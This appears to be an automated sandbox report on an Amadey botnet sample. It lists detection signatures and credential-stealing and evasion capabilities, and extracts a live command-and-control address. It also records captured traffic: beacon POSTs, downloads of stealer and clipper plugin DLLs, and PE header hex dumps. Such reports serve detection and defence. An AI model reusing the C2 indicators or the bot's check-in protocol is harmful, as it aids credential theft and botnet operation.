Windows Analysis Report
wIaKimJFke.exe

Overview

General Information

Sample name:	wIaKimJFke.exe renamed because original name is a hash value
Original sample name:	79fbd35cae4148d9053cd4590b6d41c0.exe
Analysis ID:	1417243
MD5:	79fbd35cae4148d9053cd4590b6d41c0
SHA1:	3548d8fa1f242206447224068c16ffd30278ede3
SHA256:	9c1751ba73fe53ed9385f24750212c6e785843e4c63dbafec8f95d3e6a5088ef
Tags:	exe
Infos:

Detection

Amadey

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

Snort IDS alert for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Amadeys Clipper DLL

Yara detected Amadeys stealer DLL

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Hides threads from debuggers

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

Potentially malicious time measurement code found

Sample uses string decryption to hide its real strings

Sigma detected: Suspicious Script Execution From Temp Folder

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Instant Messenger accounts or passwords

Uses netsh to modify the Windows network and firewall settings

Abnormal high CPU Usage

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet

Tries to load missing DLLs

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/ https://bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: wIaKimJFke.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png	URL Reputation: Label: malware
Source: http://185.215.113.32/yandex/index.php%	Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/index.phprsion	Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/index.phpK	Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/Plugins/clip64.dll1	Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/index.phpg	Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/index.phpVl	Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/index.php2ab05	Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/index.phpa	Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/index.php:10	Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/Plugins/clip64.dll&	Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/index.php	Avira URL Cloud: Label: malware
Source: http://185.215.113.32/ws	Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/index.phpa2ab05	Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/Plugins/cred64.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/index.phpWindows	Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/index.php?wal=1r	Avira URL Cloud: Label: malware
Source: http://185.215.113.32/	Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/index.php?wal=1tesf	Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/Plugins/clip64.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/index.phpn	Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/index.phpp	Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/index.php?wal=1&	Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/index.phpa0	Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/index.php?wal=1	Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/Plugins/cred64.dll2	Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/index.phpx	Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/index.phpu	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll	Avira: detection malicious, Label: TR/ClipBanker.rtyrx
Source: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll	Avira: detection malicious, Label: TR/PSW.Agent.szlsq
Source: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll	Avira: detection malicious, Label: TR/ClipBanker.rtyrx
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll	Avira: detection malicious, Label: TR/PSW.Agent.szlsq
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: 10.2.rundll32.exe.6e220000.0.unpack

Malware Configuration Extractor: Amadey {"C2 url": ["185.215.113.32/yandex/index.php"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll	ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll	ReversingLabs: Detection: 70%

Multi AV Scanner detection for submitted file

Source: wIaKimJFke.exe

ReversingLabs: Detection: 71%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: wIaKimJFke.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 10.2.rundll32.exe.6e220000.0.unpack	String decryptor: 185.215.113.32
Source: 10.2.rundll32.exe.6e220000.0.unpack	String decryptor: /yandex/index.php

Uses 32bit PE files

Source: wIaKimJFke.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:

Binary string: D:\Mktmp\StealerDLL\x64\Release\STEALERDLL.pdb source: cred64.dll.5.dr, cred64[1].dll.5.dr

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 10_2_6E22BA2F FindFirstFileExW,_free,FindNextFileW,_free,FindClose,_free,

10_2_6E22BA2F

Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\OneDrive\desktop.ini	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\Videos\desktop.ini	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\Music\desktop.ini	Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.4:49737 -> 185.215.113.32:80
Source: Traffic	Snort IDS: 2855239 ETPRO TROJAN Win32/Amadey Stealer Activity M4 (POST) 192.168.2.4:49743 -> 185.215.113.32:80
Source: Traffic	Snort IDS: 2856151 ETPRO TROJAN Amadey CnC Activity M7 192.168.2.4:49745 -> 185.215.113.32:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 185.215.113.32 80

Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

IPs: 185.215.113.32

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 28 Mar 2024 19:03:03 GMTContent-Type: application/octet-streamContent-Length: 1285632Last-Modified: Sun, 04 Feb 2024 16:00:19 GMTConnection: keep-aliveETag: "65bfb493-139e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c6 de c9 0d 82 bf a7 5e 82 bf a7 5e 82 bf a7 5e d9 d7 a3 5f 91 bf a7 5e d9 d7 a4 5f 92 bf a7 5e d9 d7 a2 5f 32 bf a7 5e 57 d2 a2 5f c4 bf a7 5e 57 d2 a3 5f 8d bf a7 5e 57 d2 a4 5f 8b bf a7 5e d9 d7 a6 5f 8f bf a7 5e 82 bf a6 5e 43 bf a7 5e 19 d1 ae 5f 86 bf a7 5e 19 d1 a7 5f 83 bf a7 5e 19 d1 58 5e 83 bf a7 5e 19 d1 a5 5f 83 bf a7 5e 52 69 63 68 82 bf a7 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 83 b2 bf 65 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 18 00 c0 0f 00 00 52 04 00 00 00 00 00 68 06 0d 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 14 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 89 12 00 58 00 00 00 78 89 12 00 8c 00 00 00 00 20 14 00 f8 00 00 00 00 60 13 00 28 ad 00 00 00 00 00 00 00 00 00 00 00 30 14 00 f4 15 00 00 b0 9e 11 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 9f 11 00 08 01 00 00 00 00 00 00 00 00 00 00 00 d0 0f 00 e8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 be 0f 00 00 10 00 00 00 c0 0f 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e2 cd 02 00 00 d0 0f 00 00 ce 02 00 00 c4 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 4c bb 00 00 00 a0 12 00 00 44 00 00 00 92 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 28 ad 00 00 00 60 13 00 00 ae 00 00 00 d6 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 94 00 00 00 00 10 14 00 00 02 00 00 00 84 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 f8 00 00 00 00 20 14 00 00 02 00 00 00 86 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f4 15 00 00 00 30 14 00 00 16 00 00 00 88 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 28 Mar 2024 19:03:06 GMTContent-Type: application/octet-streamContent-Length: 112128Last-Modified: Sun, 04 Feb 2024 16:00:18 GMTConnection: keep-aliveETag: "65bfb492-1b600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 f6 04 b3 63 97 6a e0 63 97 6a e0 63 97 6a e0 38 ff 69 e1 69 97 6a e0 38 ff 6f e1 eb 97 6a e0 38 ff 6e e1 71 97 6a e0 b6 fa 6e e1 6c 97 6a e0 b6 fa 69 e1 72 97 6a e0 b6 fa 6f e1 42 97 6a e0 38 ff 6b e1 64 97 6a e0 63 97 6b e0 02 97 6a e0 f8 f9 63 e1 60 97 6a e0 f8 f9 6a e1 62 97 6a e0 f8 f9 95 e0 62 97 6a e0 f8 f9 68 e1 62 97 6a e0 52 69 63 68 63 97 6a e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 85 b2 bf 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 24 01 00 00 9a 00 00 00 00 00 00 4c 66 00 00 00 10 00 00 00 40 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 02 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 20 a0 01 00 9c 00 00 00 bc a0 01 00 50 00 00 00 00 d0 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 bc 14 00 00 f0 8e 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 8f 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 96 22 01 00 00 10 00 00 00 24 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 68 00 00 00 40 01 00 00 6a 00 00 00 28 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 1c 17 00 00 00 b0 01 00 00 0c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 d0 01 00 00 02 00 00 00 9e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 bc 14 00 00 00 e0 01 00 00 16 00 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /yandex/Plugins/cred64.dll HTTP/1.1Host: 185.215.113.32
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET /yandex/Plugins/clip64.dll HTTP/1.1Host: 185.215.113.32
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
